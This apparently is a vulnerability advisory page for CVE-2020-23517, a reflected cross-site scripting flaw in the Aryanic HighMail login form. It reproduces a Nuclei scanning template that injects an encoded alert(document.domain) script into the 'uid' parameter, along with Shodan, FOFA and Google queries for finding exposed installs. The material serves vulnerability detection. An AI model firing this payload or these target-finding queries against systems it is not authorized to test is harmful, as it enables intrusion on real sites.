CVE-2020-23517: Aryanic HighMail (High CMS) - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Aryanic HighMail | POC: 已公开

漏洞描述

A cross-site scripting vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm.

PoC代码[已公开]

id: CVE-2020-23517

info:
  name: Aryanic HighMail (High CMS) - Cross-Site Scripting
  author: geeknik
  severity: medium
  description: A cross-site scripting vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
  reference:
    - https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-23517
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Elsfa7-110/kenzer-templates
    - https://github.com/d4n-sec/d4n-sec.github.io
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-23517
    cwe-id: CWE-79
    epss-score: 0.06369
    epss-percentile: 0.90635
    cpe: cpe:2.3:a:aryanic:high_cms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: aryanic
    product: high_cms
    shodan-query:
      - title:"HighMail"
      - http.title:"highmail"
    fofa-query:
      - title="HighMail"
      - title="highmail"
    google-query: intitle:"highmail"
  tags: cve,cve2020,xss,cms,highmail,aryanic

http:
  - method: GET
    path:
      - "{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
      - "{{BaseURL}}/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'value=""><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d8419f83123798f80814d215106c2a270513f8775535b6abe0ffdd4658b82a2c0220534433c2b04959e04d8114e7691883ddc95a87410f9a98fbf4494c7bf8b4f053:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-23517.yaml